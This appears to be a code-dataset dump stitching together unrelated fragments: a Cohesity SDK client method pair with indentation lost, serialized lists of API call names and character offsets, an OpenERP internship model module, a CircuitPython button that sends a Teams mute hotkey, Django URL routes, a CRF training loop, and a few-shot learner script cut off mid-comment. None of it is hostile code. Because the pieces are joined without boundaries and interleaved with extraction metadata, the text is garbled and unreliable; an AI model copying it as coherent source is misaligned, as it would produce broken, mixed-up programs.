except Exception as e:
self.logger.error(e, exc_info = True)
raise
def get_protection_policies(self,
environments=None,
vault_ids=None,
tenant_ids=None,
all_under_hierarchy=None,
ids=None,
names=None):
"""Does a GET request to /public/protectionPolicies.
If no parameters are specified, all Protection Policies currently on
the
Cohesity Cluster are returned.
Specifying parameters filters the results that are returned.
Args:
environments (list of Environments1Enum, optional): Filter by
Environment type such as 'kVMware', 'kView', etc. Only
Policies protecting the specified environment type are
returned. NOTE: 'kPuppeteer' refers to Cohesity's Remote
Adapter.
vault_ids (list of long|int, optional): Filter by a list of Vault
ids. Policies archiving to any of the specified vaults will be
returned.
tenant_ids (list of string, optional): TenantIds contains ids of
the tenants for which objects are to be returned.
all_under_hierarchy (bool, optional): AllUnderHierarchy specifies
if objects of all the tenants under the hierarchy of the
logged in user's organization should be returned.
ids (list of string, optional): Filter by a list of Protection
Policy ids.
names (list of string, optional): Filter by a list of Protection
Policy names.
Returns:
list of ProtectionPolicy: Response from the API. Success
Raises:
APIException: When an error occurs while fetching the data from
the remote API. This exception includes the HTTP Response
code, an error message, and the HTTP body that was received in
the request.
"""
try:
self.logger.info('get_protection_policies called.')
# Prepare query URL
self.logger.info('Preparing query URL for get_protection_policies.')
_url_path = '/public/protectionPolicies'
_query_builder = Configuration.get_base_uri()
_query_builder += _url_path
_query_parameters = {
'environments': environments,
'vaultIds': vault_ids,
'tenantIds': tenant_ids,
'allUnderHierarchy': all_under_hierarchy,
'ids': ids,
'names': names
}
_query_builder = APIHelper.append_url_with_query_parameters(_query_builder,
_query_parameters, Configuration.array_serialization)
_query_url = APIHelper.clean_url(_query_builder)
# Prepare headers
self.logger.info('Preparing headers for get_protection_policies.')
_headers = {
'accept': 'application/json'
}
# Prepare and execute request
self.logger.info('Preparing and executing request for get_protection_policies.')
_request = self.http_client.get(_query_url, headers=_headers)
AuthManager.apply(_request)
_context = self.execute_request(_request, name = 'get_protection_policies')
# Endpoint and global error handling using HTTP status codes.
self.logger.info('Validating response for get_protection_policies.')
if _context.response.status_code == 0:
raise ErrorErrorException('Error', _context)
self.validate_response(_context)
# Return appropriate type
return APIHelper.json_deserialize(_context.response.raw_body, ProtectionPolicy.from_dictionary)
except Exception as e:
self.logger.error(e, exc_info = True)
raise
def create_protection_policy(self,
body):
"""Does a POST request to /public/protectionPolicies.
Returns the created Protection Policy.
Args:
body (ProtectionPolicyRequest): Request to create a Protection
Policy.
Returns:
ProtectionPolicy: Response from the API. Success
Raises:
APIException: When an error occurs while fetching the data from
the remote API. This exception includes the HTTP Response
code, an error message, and the HTTP body that was received in
the request.
"""
try:
self.logger.info('create_protection_policy called.')
# Validate required parameters
self.logger.info('Validating required parameters for create_protection_policy.')
self.validate_parameters(body=body)
# Prepare query URL
self.logger.info('Preparing query URL for create_protection_policy.')
_url_path = '/public/protectionPolicies'
_query_builder = Configuration.get_base_uri()
_query_builder += _url_path
_query_url = APIHelper.clean_url(_query_builder)
# Prepare headers
self.logger.info('Preparing headers for create_protection_policy.')
_headers = {
'accept': 'application/json',
'content-type': 'application/json; charset=utf-8'
}
# Prepare and execute request
self.logger.info('Preparing and executing request for create_protection_policy.')
_request = self.http_client.post(_query_url, headers=_headers, parameters=APIHelper.json_serialize(body))
AuthManager.apply(_request)
_context = self.execute_request(_request, name = 'create_protection_policy')
# Endpoint and global error handling using HTTP status codes.
self.logger.info('Validating response for create_protection_policy.')
if _context.response.status_code == 0:
raise ErrorErrorException('Error', _context)
self.validate_response(_context)
# Return appropriate type
return APIHelper.json_deserialize(_context.response.raw_body, ProtectionPolicy.from_dictionary)
except Exception as e:
self.logger.error(e, exc_info = True)
raise
| [
"logging.getLogger",
"cohesity_management_sdk.configuration.Configuration.get_base_uri",
"cohesity_management_sdk.api_helper.APIHelper.append_url_with_template_parameters",
"cohesity_management_sdk.api_helper.APIHelper.json_serialize",
"cohesity_management_sdk.api_helper.APIHelper.clean_url",
"cohesity_ma... | [((776, 803), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (793, 803), False, 'import logging\n'), ((1989, 2057), 'cohesity_management_sdk.api_helper.APIHelper.append_url_with_template_parameters', 'APIHelper.append_url_with_template_parameters', (['_url_path', "{'id': id}"], {}), "(_url_path, {'id': id})\n", (2034, 2057), False, 'from cohesity_management_sdk.api_helper import APIHelper\n'), ((2117, 2145), 'cohesity_management_sdk.configuration.Configuration.get_base_uri', 'Configuration.get_base_uri', ([], {}), '()\n', (2143, 2145), False, 'from cohesity_management_sdk.configuration import Configuration\n'), ((2211, 2246), 'cohesity_management_sdk.api_helper.APIHelper.clean_url', 'APIHelper.clean_url', (['_query_builder'], {}), '(_query_builder)\n', (2230, 2246), False, 'from cohesity_management_sdk.api_helper import APIHelper\n'), ((2671, 2698), 'cohesity_management_sdk.http.auth.auth_manager.AuthManager.apply', 'AuthManager.apply', (['_request'], {}), '(_request)\n', (2688, 2698), False, 'from cohesity_management_sdk.http.auth.auth_manager import AuthManager\n'), ((3166, 3259), 'cohesity_management_sdk.api_helper.APIHelper.json_deserialize', 'APIHelper.json_deserialize', (['_context.response.raw_body', 'ProtectionPolicy.from_dictionary'], {}), '(_context.response.raw_body, ProtectionPolicy.\n from_dictionary)\n', (3192, 3259), False, 'from cohesity_management_sdk.api_helper import APIHelper\n'), ((4670, 4738), 'cohesity_management_sdk.api_helper.APIHelper.append_url_with_template_parameters', 'APIHelper.append_url_with_template_parameters', (['_url_path', "{'id': id}"], {}), "(_url_path, {'id': id})\n", (4715, 4738), False, 'from cohesity_management_sdk.api_helper import APIHelper\n'), ((4798, 4826), 'cohesity_management_sdk.configuration.Configuration.get_base_uri', 'Configuration.get_base_uri', ([], {}), '()\n', (4824, 4826), False, 'from cohesity_management_sdk.configuration import Configuration\n'), ((4892, 
4927), 'cohesity_management_sdk.api_helper.APIHelper.clean_url', 'APIHelper.clean_url', (['_query_builder'], {}), '(_query_builder)\n', (4911, 4927), False, 'from cohesity_management_sdk.api_helper import APIHelper\n'), ((5456, 5483), 'cohesity_management_sdk.http.auth.auth_manager.AuthManager.apply', 'AuthManager.apply', (['_request'], {}), '(_request)\n', (5473, 5483), False, 'from cohesity_management_sdk.http.auth.auth_manager import AuthManager\n'), ((5945, 6038), 'cohesity_management_sdk.api_helper.APIHelper.json_deserialize', 'APIHelper.json_deserialize', (['_context.response.raw_body', 'ProtectionPolicy.from_dictionary'], {}), '(_context.response.raw_body, ProtectionPolicy.\n from_dictionary)\n', (5971, 6038), False, 'from cohesity_management_sdk.api_helper import APIHelper\n'), ((7271, 7339), 'cohesity_management_sdk.api_helper.APIHelper.append_url_with_template_parameters', 'APIHelper.append_url_with_template_parameters', (['_url_path', "{'id': id}"], {}), "(_url_path, {'id': id})\n", (7316, 7339), False, 'from cohesity_management_sdk.api_helper import APIHelper\n'), ((7399, 7427), 'cohesity_management_sdk.configuration.Configuration.get_base_uri', 'Configuration.get_base_uri', ([], {}), '()\n', (7425, 7427), False, 'from cohesity_management_sdk.configuration import Configuration\n'), ((7493, 7528), 'cohesity_management_sdk.api_helper.APIHelper.clean_url', 'APIHelper.clean_url', (['_query_builder'], {}), '(_query_builder)\n', (7512, 7528), False, 'from cohesity_management_sdk.api_helper import APIHelper\n'), ((7737, 7764), 'cohesity_management_sdk.http.auth.auth_manager.AuthManager.apply', 'AuthManager.apply', (['_request'], {}), '(_request)\n', (7754, 7764), False, 'from cohesity_management_sdk.http.auth.auth_manager import AuthManager\n'), ((10589, 10617), 'cohesity_management_sdk.configuration.Configuration.get_base_uri', 'Configuration.get_base_uri', ([], {}), '()\n', (10615, 10617), False, 'from cohesity_management_sdk.configuration import 
Configuration\n'), ((10978, 11094), 'cohesity_management_sdk.api_helper.APIHelper.append_url_with_query_parameters', 'APIHelper.append_url_with_query_parameters', (['_query_builder', '_query_parameters', 'Configuration.array_serialization'], {}), '(_query_builder,\n _query_parameters, Configuration.array_serialization)\n', (11020, 11094), False, 'from cohesity_management_sdk.api_helper import APIHelper\n'), ((11132, 11167), 'cohesity_management_sdk.api_helper.APIHelper.clean_url', 'APIHelper.clean_url', (['_query_builder'], {}), '(_query_builder)\n', (11151, 11167), False, 'from cohesity_management_sdk.api_helper import APIHelper\n'), ((11584, 11611), 'cohesity_management_sdk.http.auth.auth_manager.AuthManager.apply', 'AuthManager.apply', (['_request'], {}), '(_request)\n', (11601, 11611), False, 'from cohesity_management_sdk.http.auth.auth_manager import AuthManager\n'), ((12071, 12164), 'cohesity_management_sdk.api_helper.APIHelper.json_deserialize', 'APIHelper.json_deserialize', (['_context.response.raw_body', 'ProtectionPolicy.from_dictionary'], {}), '(_context.response.raw_body, ProtectionPolicy.\n from_dictionary)\n', (12097, 12164), False, 'from cohesity_management_sdk.api_helper import APIHelper\n'), ((13391, 13419), 'cohesity_management_sdk.configuration.Configuration.get_base_uri', 'Configuration.get_base_uri', ([], {}), '()\n', (13417, 13419), False, 'from cohesity_management_sdk.configuration import Configuration\n'), ((13485, 13520), 'cohesity_management_sdk.api_helper.APIHelper.clean_url', 'APIHelper.clean_url', (['_query_builder'], {}), '(_query_builder)\n', (13504, 13520), False, 'from cohesity_management_sdk.api_helper import APIHelper\n'), ((14050, 14077), 'cohesity_management_sdk.http.auth.auth_manager.AuthManager.apply', 'AuthManager.apply', (['_request'], {}), '(_request)\n', (14067, 14077), False, 'from cohesity_management_sdk.http.auth.auth_manager import AuthManager\n'), ((14539, 14632), 
'cohesity_management_sdk.api_helper.APIHelper.json_deserialize', 'APIHelper.json_deserialize', (['_context.response.raw_body', 'ProtectionPolicy.from_dictionary'], {}), '(_context.response.raw_body, ProtectionPolicy.\n from_dictionary)\n', (14565, 14632), False, 'from cohesity_management_sdk.api_helper import APIHelper\n'), ((3024, 3062), 'cohesity_management_sdk.exceptions.error_error_exception.ErrorErrorException', 'ErrorErrorException', (['"""Error"""', '_context'], {}), "('Error', _context)\n", (3043, 3062), False, 'from cohesity_management_sdk.exceptions.error_error_exception import ErrorErrorException\n'), ((5803, 5841), 'cohesity_management_sdk.exceptions.error_error_exception.ErrorErrorException', 'ErrorErrorException', (['"""Error"""', '_context'], {}), "('Error', _context)\n", (5822, 5841), False, 'from cohesity_management_sdk.exceptions.error_error_exception import ErrorErrorException\n'), ((8084, 8122), 'cohesity_management_sdk.exceptions.error_error_exception.ErrorErrorException', 'ErrorErrorException', (['"""Error"""', '_context'], {}), "('Error', _context)\n", (8103, 8122), False, 'from cohesity_management_sdk.exceptions.error_error_exception import ErrorErrorException\n'), ((11929, 11967), 'cohesity_management_sdk.exceptions.error_error_exception.ErrorErrorException', 'ErrorErrorException', (['"""Error"""', '_context'], {}), "('Error', _context)\n", (11948, 11967), False, 'from cohesity_management_sdk.exceptions.error_error_exception import ErrorErrorException\n'), ((14397, 14435), 'cohesity_management_sdk.exceptions.error_error_exception.ErrorErrorException', 'ErrorErrorException', (['"""Error"""', '_context'], {}), "('Error', _context)\n", (14416, 14435), False, 'from cohesity_management_sdk.exceptions.error_error_exception import ErrorErrorException\n'), ((5412, 5442), 'cohesity_management_sdk.api_helper.APIHelper.json_serialize', 'APIHelper.json_serialize', (['body'], {}), '(body)\n', (5436, 5442), False, 'from cohesity_management_sdk.api_helper 
import APIHelper\n'), ((14006, 14036), 'cohesity_management_sdk.api_helper.APIHelper.json_serialize', 'APIHelper.json_serialize', (['body'], {}), '(body)\n', (14030, 14036), False, 'from cohesity_management_sdk.api_helper import APIHelper\n')] |
# -*- coding: utf-8 -*-
from openerp.osv import osv
from openerp.osv import fields
import time
class stage_tache(osv.osv):
    """Lookup model for internship task types (stage.tache)."""
    _name = 'stage.tache'
    _description = 'stage_tache'
    # Single free-text field holding the task-type label.
    _columns = {'type': fields.char('Type', size=100, required=True)}
# Instantiate once to register the model with the ORM (old-style OpenERP API).
stage_tache()
class stage_type(osv.osv):
    """Lookup model for internship types (stage.type)."""
    _name = 'stage.type'
    _description = 'stage_type'
    # Single free-text field holding the type label.
    _columns = {'type': fields.char('Type', size=100, required=True)}
# Instantiate once to register the model with the ORM (old-style OpenERP API).
stage_type()
class stage_statut(osv.osv):
    """Lookup model for internship statuses (stage.statut)."""
    _name = 'stage.statut'
    _description = 'stage_statut'
    # Single free-text field holding the status label (field key is 'type').
    _columns = {'type': fields.char('Status', size=100, required=True)}
# Instantiate once to register the model with the ORM (old-style OpenERP API).
stage_statut()
class stage_stage(osv.osv):
    """Internship record (stage.stage): subject plus start/end dates."""
    _name = 'stage.stage'
    _description = 'stage_stage'
    _columns = {
        # Subject of the internship.
        'sujet': fields.char('sujet', size=100, required=True),
        # Start and end dates; both are mandatory.
        'date_debut': fields.date('Date Début', required=True),
        'date_fin': fields.date('Date Fin', required=True),
    }
# Instantiate once to register the model with the ORM (old-style OpenERP API).
stage_stage()
| [
"openerp.osv.fields.char",
"openerp.osv.fields.date"
] | [((239, 283), 'openerp.osv.fields.char', 'fields.char', (['"""Type"""'], {'size': '(100)', 'required': '(True)'}), "('Type', size=100, required=True)\n", (250, 283), False, 'from openerp.osv import fields\n'), ((444, 488), 'openerp.osv.fields.char', 'fields.char', (['"""Type"""'], {'size': '(100)', 'required': '(True)'}), "('Type', size=100, required=True)\n", (455, 488), False, 'from openerp.osv import fields\n'), ((656, 702), 'openerp.osv.fields.char', 'fields.char', (['"""Status"""'], {'size': '(100)', 'required': '(True)'}), "('Status', size=100, required=True)\n", (667, 702), False, 'from openerp.osv import fields\n'), ((868, 913), 'openerp.osv.fields.char', 'fields.char', (['"""sujet"""'], {'size': '(100)', 'required': '(True)'}), "('sujet', size=100, required=True)\n", (879, 913), False, 'from openerp.osv import fields\n'), ((930, 970), 'openerp.osv.fields.date', 'fields.date', (['"""Date Début"""'], {'required': '(True)'}), "('Date Début', required=True)\n", (941, 970), False, 'from openerp.osv import fields\n'), ((985, 1023), 'openerp.osv.fields.date', 'fields.date', (['"""Date Fin"""'], {'required': '(True)'}), "('Date Fin', required=True)\n", (996, 1023), False, 'from openerp.osv import fields\n')] |
"""Button which sends one key combination."""
import time
import board
from digitalio import DigitalInOut, Direction, Pull
from adafruit_hid.keyboard import Keyboard
from adafruit_hid.keycode import Keycode
from adafruit_hid.keyboard_layout_us import KeyboardLayoutUS
import usb_hid
# Status LED mirrors the current mute state.
led = DigitalInOut(board.LED)
led.direction = Direction.OUTPUT
# Present the board to the host as a USB keyboard.
kbd = Keyboard(usb_hid.devices)
layout = KeyboardLayoutUS(kbd)
# Button wired active-low: pressing it pulls the pin to ground (value False).
button = DigitalInOut(board.D10)
button.direction = Direction.INPUT
button.pull = Pull.UP
is_led_on = False        # tracks whether Teams is currently muted
is_button_ready = True   # debounce latch: re-armed only after release
while True:
    # Fix over the original: use truthiness instead of `is False`/`is True`
    # identity checks, and send the (identical) hotkey from one place.
    if is_button_ready and not button.value:  # button pressed (active low)
        is_button_ready = False
        is_led_on = not is_led_on
        # Ctrl+Shift+M toggles mute in Microsoft Teams in both directions;
        # only the log message and LED state differ.
        if is_led_on:
            print("Mute Microsoft Teams ...")
        else:
            print("Unmute Microsoft Teams ...")
        kbd.send(Keycode.CONTROL, Keycode.SHIFT, Keycode.M)
        led.value = is_led_on
    if button.value:  # button released: re-arm for the next press
        is_button_ready = True
    time.sleep(0.05)
| [
"digitalio.DigitalInOut",
"adafruit_hid.keyboard.Keyboard",
"time.sleep",
"adafruit_hid.keyboard_layout_us.KeyboardLayoutUS"
] | [((311, 334), 'digitalio.DigitalInOut', 'DigitalInOut', (['board.LED'], {}), '(board.LED)\n', (323, 334), False, 'from digitalio import DigitalInOut, Direction, Pull\n'), ((399, 424), 'adafruit_hid.keyboard.Keyboard', 'Keyboard', (['usb_hid.devices'], {}), '(usb_hid.devices)\n', (407, 424), False, 'from adafruit_hid.keyboard import Keyboard\n'), ((434, 455), 'adafruit_hid.keyboard_layout_us.KeyboardLayoutUS', 'KeyboardLayoutUS', (['kbd'], {}), '(kbd)\n', (450, 455), False, 'from adafruit_hid.keyboard_layout_us import KeyboardLayoutUS\n'), ((482, 505), 'digitalio.DigitalInOut', 'DigitalInOut', (['board.D10'], {}), '(board.D10)\n', (494, 505), False, 'from digitalio import DigitalInOut, Direction, Pull\n'), ((1181, 1197), 'time.sleep', 'time.sleep', (['(0.05)'], {}), '(0.05)\n', (1191, 1197), False, 'import time\n')] |
from django.conf.urls import url
from .views import ResaleListView, detailed
# Route table for the resale app: the class-based list view at the root
# (named 'index') and the function-based detail view at /<pk>/ (named
# 'detailed', capturing the primary key as a numeric string).
urlpatterns = [
    url(r'^$', ResaleListView.as_view(), name='index'),
    url(r'^(?P<pk>\d+)/$', detailed, name='detailed'),
]
| [
"django.conf.urls.url"
] | [((156, 205), 'django.conf.urls.url', 'url', (['"""^(?P<pk>\\\\d+)/$"""', 'detailed'], {'name': '"""detailed"""'}), "('^(?P<pk>\\\\d+)/$', detailed, name='detailed')\n", (159, 205), False, 'from django.conf.urls import url\n')] |
import os
import math
import gzip
import csv
import time
import torch
import torch.optim as optim
import torch.utils.data as data_utils
from sklearn.model_selection import train_test_split
from tqdm import tqdm
# import matplotlib.pyplot as plt
import numpy as np
from crf import CRF
# import Data Loader
from data_loader import get_dataset
if __name__ == '__main__':
    # hyperparameters, dimensions and model parameters
    dim = 128
    epochs = 1
    labels = 26  # number of output classes (presumably a-z) -- confirm against data_loader
    max_iter = 500  # hard cap on optimizer steps per epoch
    embed_dim = 128
    batch_size = 64
    conv_shapes = [[1, 64, 128]]
    device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
    # model and optimizer
    model = CRF(dim, embed_dim, conv_shapes, labels, batch_size).to(device)
    opt = optim.LBFGS(model.parameters(), lr=0.01)
    dataset = get_dataset()
    print(dataset.target.shape, dataset.data.shape)
    # X_train, X_test, y_train, y_test = train_test_split(dataset.data, dataset.target, test_size=0.3, stratify=dataset.target)
    # Plain sequential 70/30 split (no shuffling or stratification).
    split = int(0.7 * len(dataset.data))
    X_train, X_test = dataset.data[:split], dataset.data[split:]
    y_train, y_test = dataset.target[:split], dataset.target[split:]
    # train_data = train_data.to(device)
    # test_data = test_data.to(device)
    # train_target = train_target.to(device)
    # test_target = test_target.to(device)
    train = data_utils.TensorDataset(torch.tensor(X_train).float(), torch.tensor(y_train).float())
    test = data_utils.TensorDataset(torch.tensor(X_test).float(), torch.tensor(y_test).float())
    # train = train.to(device)
    # test = test.to(device)
    # print(len(train[0][1][0]))
    # Running histories of per-step letter- and word-level accuracies.
    train_letter, test_letter, train_word, test_word = [], [], [], []
    # Clear all log files
    dir_name = "Q4"
    files = os.listdir(dir_name)
    for file in files:
        if file.endswith(".txt"):
            with open(os.path.join(dir_name, file), "r+") as f:
                f.truncate(0)
                f.close()
    for i in range(epochs):
        step = 1
        print("\nEpoch {}".format(i + 1))
        start_epoch = time.time()
        train_data = data_utils.DataLoader(train, batch_size=batch_size, shuffle=True, sampler=None, num_workers=5,
                                           pin_memory=True)
        test_data = data_utils.DataLoader(test, batch_size=batch_size, shuffle=True, sampler=None, num_workers=5,
                                          pin_memory=True)
        train_mean_word_accuracy, test_mean_word_accuracy, train_mean_letter_accuracy, test_mean_letter_accuracy = 0, 0, 0, 0
        for batch, sample in tqdm(enumerate(train_data)):
            print("\nEpoch-{} Mini-Batch-{}".format(i + 1, batch))
            start_t = time.time()
            train_X = sample[0].to(device)
            train_Y = sample[1].to(device)
            # LBFGS may re-evaluate the objective several times per step, so
            # the loss is wrapped in a closure that zeroes grads and backprops
            # on every call (closing over the current mini-batch).
            def compute_loss():
                opt.zero_grad()
                _loss = model.loss(train_X, train_Y)
                _loss.backward()
                return _loss
            start_step = time.time()
            opt.step(compute_loss)
            print("Epoch-{} Batch-{} Step-{} TIME ELAPSED = {}".format(i + 1, batch, step, time.time() - start_step))
            for name, values in model.named_parameters():
                if values.requires_grad:
                    print("Parameters", name, values.data)
            # Draw a random test mini-batch of the same size for evaluation.
            random_index = np.random.choice(X_test.shape[0], batch_size, replace=False)
            test_X = X_test[random_index, :]
            test_Y = y_test[random_index, :]
            test_X = torch.from_numpy(test_X).float().to(device)
            test_Y = torch.from_numpy(test_Y).long().to(device)
            total_train_words = len(train_Y)
            total_test_words = len(test_Y)
            # NOTE(review): letter totals are computed as torch.sum(Y), which only
            # equals the letter count if Y is a per-letter indicator encoding --
            # confirm against the data_loader target format.
            total_train_letters = torch.sum(train_Y).item()
            total_test_letters = torch.sum(test_Y).item()
            print("Getting Accuracy")
            with torch.no_grad():
                print("Training predictions-->")
                train_predictions = model(train_X)
                print("Test predictions-->")
                test_predictions = model(test_X)
            # A word counts as correct only if all of its first `letters`
            # positions match; letter accuracy subtracts half the mismatch
            # count (NOTE(review): the /2 presumably compensates for a paired
            # encoding -- verify).
            word_acc_train = 0
            letter_acc_train = 0
            for y, y_preds in zip(train_Y, train_predictions):
                letters = int(torch.sum(y).item())
                if torch.all(torch.eq(y[:letters], y_preds[:letters])):
                    word_acc_train = word_acc_train + 1
                letter_acc_train = letter_acc_train + letters - (
                        ((~torch.eq(y[:letters], y_preds[:letters])).sum()) / 2).item()
            word_accuracy_test = 0
            letter_accuracy_test = 0
            for y, y_preds in zip(test_Y, test_predictions):
                letters = int(torch.sum(y).item())
                if torch.all(torch.eq(y[:letters], y_preds[:letters])):
                    word_accuracy_test = word_accuracy_test + 1
                letter_accuracy_test = letter_accuracy_test + letters - (
                        ((~torch.eq(y[:letters], y_preds[:letters])).sum()) / 2).item()
            # Normalize raw counts to fractions.
            letter_acc_train /= total_train_letters
            letter_accuracy_test /= total_test_letters
            word_acc_train /= total_train_words
            word_accuracy_test /= total_test_words
            ## collect accuracies for 100 steps
            train_letter.append(letter_acc_train)
            test_letter.append(letter_accuracy_test)
            train_word.append(word_acc_train)
            test_word.append(word_accuracy_test)
            # Append this step's accuracies to the Q4 log files (cleared above).
            f_trainingepoc = open("Q4/wordwise_training.txt", "a")
            f_trainingepoc.write(str(word_acc_train) + "\n")
            f_trainingepoc.close()
            f_trainingepoc = open("Q4/letterwise_training.txt", "a")
            f_trainingepoc.write(str(letter_acc_train) + "\n")
            f_trainingepoc.close()
            f_wtestingepoc = open("Q4/wordwise_testing.txt", "a")
            f_wtestingepoc.write(str(word_accuracy_test) + "\n")
            f_wtestingepoc.close()
            f_testingepoc = open("Q4/letterwise_testing.txt", "a")
            f_testingepoc.write(str(letter_accuracy_test) + "\n")
            f_testingepoc.close()
            print("\nTraining Accuracy ")
            print("\tWord Acc = ", train_word)
            print("\tLetter Acc = ", train_letter)
            print(" Test Accuracy : ")
            print("\tWord accuracy = ", test_word)
            print("\tLetter accuracy = ", test_letter)
            # Running means over all steps so far in this run.
            train_mean_word_accuracy = sum(train_word) / len(train_word)
            test_mean_word_accuracy = sum(test_word) / len(test_word)
            train_mean_letter_accuracy = sum(train_letter) / len(train_letter)
            test_mean_letter_accuracy = sum(test_letter) / len(test_letter)
            print(
                "\n Train mean word accuracy = {}\n Test mean word accuracy = {}\n Train mean letter accuracy = {}\n Test mean letter accuracy = {}\n".format(
                    train_mean_word_accuracy, test_mean_word_accuracy, train_mean_letter_accuracy,
                    test_mean_letter_accuracy))
            print("Epoch-{} Batch-{} Step-{} TIME TAKEN = {}".format(i, batch, step, time.time() - start_t))
            step += 1
            if step > max_iter: break
        print("Epoch completed Epoch-{} Batch-{} Step-{} TIME ELAPSED = {}".format(i + 1, batch, step - 1,
                                                                                   time.time() - start_epoch)) | [
"os.listdir",
"numpy.random.choice",
"os.path.join",
"torch.from_numpy",
"torch.eq",
"torch.tensor",
"torch.cuda.is_available",
"data_loader.get_dataset",
"torch.sum",
"torch.utils.data.DataLoader",
"torch.no_grad",
"crf.CRF",
"time.time"
] | [((841, 854), 'data_loader.get_dataset', 'get_dataset', ([], {}), '()\n', (852, 854), False, 'from data_loader import get_dataset\n'), ((1818, 1838), 'os.listdir', 'os.listdir', (['dir_name'], {}), '(dir_name)\n', (1828, 1838), False, 'import os\n'), ((2138, 2149), 'time.time', 'time.time', ([], {}), '()\n', (2147, 2149), False, 'import time\n'), ((2174, 2290), 'torch.utils.data.DataLoader', 'data_utils.DataLoader', (['train'], {'batch_size': 'batch_size', 'shuffle': '(True)', 'sampler': 'None', 'num_workers': '(5)', 'pin_memory': '(True)'}), '(train, batch_size=batch_size, shuffle=True, sampler=\n None, num_workers=5, pin_memory=True)\n', (2195, 2290), True, 'import torch.utils.data as data_utils\n'), ((2351, 2466), 'torch.utils.data.DataLoader', 'data_utils.DataLoader', (['test'], {'batch_size': 'batch_size', 'shuffle': '(True)', 'sampler': 'None', 'num_workers': '(5)', 'pin_memory': '(True)'}), '(test, batch_size=batch_size, shuffle=True, sampler=\n None, num_workers=5, pin_memory=True)\n', (2372, 2466), True, 'import torch.utils.data as data_utils\n'), ((628, 653), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (651, 653), False, 'import torch\n'), ((708, 760), 'crf.CRF', 'CRF', (['dim', 'embed_dim', 'conv_shapes', 'labels', 'batch_size'], {}), '(dim, embed_dim, conv_shapes, labels, batch_size)\n', (711, 760), False, 'from crf import CRF\n'), ((2784, 2795), 'time.time', 'time.time', ([], {}), '()\n', (2793, 2795), False, 'import time\n'), ((3102, 3113), 'time.time', 'time.time', ([], {}), '()\n', (3111, 3113), False, 'import time\n'), ((3460, 3520), 'numpy.random.choice', 'np.random.choice', (['X_test.shape[0]', 'batch_size'], {'replace': '(False)'}), '(X_test.shape[0], batch_size, replace=False)\n', (3476, 3520), True, 'import numpy as np\n'), ((1429, 1450), 'torch.tensor', 'torch.tensor', (['X_train'], {}), '(X_train)\n', (1441, 1450), False, 'import torch\n'), ((1460, 1481), 'torch.tensor', 'torch.tensor', (['y_train'], {}), 
'(y_train)\n', (1472, 1481), False, 'import torch\n'), ((1528, 1548), 'torch.tensor', 'torch.tensor', (['X_test'], {}), '(X_test)\n', (1540, 1548), False, 'import torch\n'), ((1558, 1578), 'torch.tensor', 'torch.tensor', (['y_test'], {}), '(y_test)\n', (1570, 1578), False, 'import torch\n'), ((4015, 4030), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (4028, 4030), False, 'import torch\n'), ((1923, 1951), 'os.path.join', 'os.path.join', (['dir_name', 'file'], {}), '(dir_name, file)\n', (1935, 1951), False, 'import os\n'), ((3871, 3889), 'torch.sum', 'torch.sum', (['train_Y'], {}), '(train_Y)\n', (3880, 3889), False, 'import torch\n'), ((3931, 3948), 'torch.sum', 'torch.sum', (['test_Y'], {}), '(test_Y)\n', (3940, 3948), False, 'import torch\n'), ((4446, 4486), 'torch.eq', 'torch.eq', (['y[:letters]', 'y_preds[:letters]'], {}), '(y[:letters], y_preds[:letters])\n', (4454, 4486), False, 'import torch\n'), ((4928, 4968), 'torch.eq', 'torch.eq', (['y[:letters]', 'y_preds[:letters]'], {}), '(y[:letters], y_preds[:letters])\n', (4936, 4968), False, 'import torch\n'), ((7646, 7657), 'time.time', 'time.time', ([], {}), '()\n', (7655, 7657), False, 'import time\n'), ((3242, 3253), 'time.time', 'time.time', ([], {}), '()\n', (3251, 3253), False, 'import time\n'), ((7364, 7375), 'time.time', 'time.time', ([], {}), '()\n', (7373, 7375), False, 'import time\n'), ((3635, 3659), 'torch.from_numpy', 'torch.from_numpy', (['test_X'], {}), '(test_X)\n', (3651, 3659), False, 'import torch\n'), ((3701, 3725), 'torch.from_numpy', 'torch.from_numpy', (['test_Y'], {}), '(test_Y)\n', (3717, 3725), False, 'import torch\n'), ((4395, 4407), 'torch.sum', 'torch.sum', (['y'], {}), '(y)\n', (4404, 4407), False, 'import torch\n'), ((4877, 4889), 'torch.sum', 'torch.sum', (['y'], {}), '(y)\n', (4886, 4889), False, 'import torch\n'), ((4645, 4685), 'torch.eq', 'torch.eq', (['y[:letters]', 'y_preds[:letters]'], {}), '(y[:letters], y_preds[:letters])\n', (4653, 4685), False, 'import torch\n'), 
((5143, 5183), 'torch.eq', 'torch.eq', (['y[:letters]', 'y_preds[:letters]'], {}), '(y[:letters], y_preds[:letters])\n', (5151, 5183), False, 'import torch\n')] |
import torch
import numpy as np
import argparse
import os
from utils import Logger, LogFiles, ValidationAccuracies, cross_entropy_loss, compute_accuracy, MetaLearningState,\
shuffle
from model import FewShotClassifier
from dataset import get_dataset_reader
from tf_dataset_reader import TfDatasetReader
from image_folder_reader import ImageFolderReader
# Number of tasks sampled when validating during meta-training
# (usage is elsewhere in this file -- not visible in this chunk).
NUM_VALIDATION_TASKS = 200
# Number of tasks sampled per dataset at meta-test time.
NUM_TEST_TASKS = 600
# Iteration interval for periodic progress reporting.
PRINT_FREQUENCY = 1000
def main():
    """Script entry point: construct a Learner and start its run loop."""
    Learner().run()
class Learner:
    def __init__(self):
        """Parse options, set up logging, and build the model, data readers and optimizer."""
        self.args = self.parse_command_line()
        # Log files treat both test modes as "testing" (third argument).
        self.log_files = LogFiles(self.args.checkpoint_dir, self.args.resume_from_checkpoint,
                                  (self.args.mode == 'test') or (self.args.mode == 'test_vtab'))
        self.logger = Logger(self.args.checkpoint_dir, "log.txt")
        self.logger.print_and_log("Options: %s\n" % self.args)
        self.logger.print_and_log("Checkpoint Directory: %s\n" % self.log_files.checkpoint_dir)
        self.device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')
        self.model = self.init_model()
        self.train_set, self.validation_set, self.test_set = self.init_data()
        # The dataset reader is only built for meta-train/meta-test modes;
        # 'test_vtab' presumably uses the tensorflow-dataset readers instead
        # (see the tf_dataset_reader import) -- confirm in run().
        if self.args.mode == "train" or self.args.mode == "test" or self.args.mode == 'train_test':
            self.dataset = get_dataset_reader(
                args=self.args,
                train_set=self.train_set,
                validation_set=self.validation_set,
                test_set=self.test_set)
        # Dispatch on --train_method: 'lite' uses train_lite, everything else
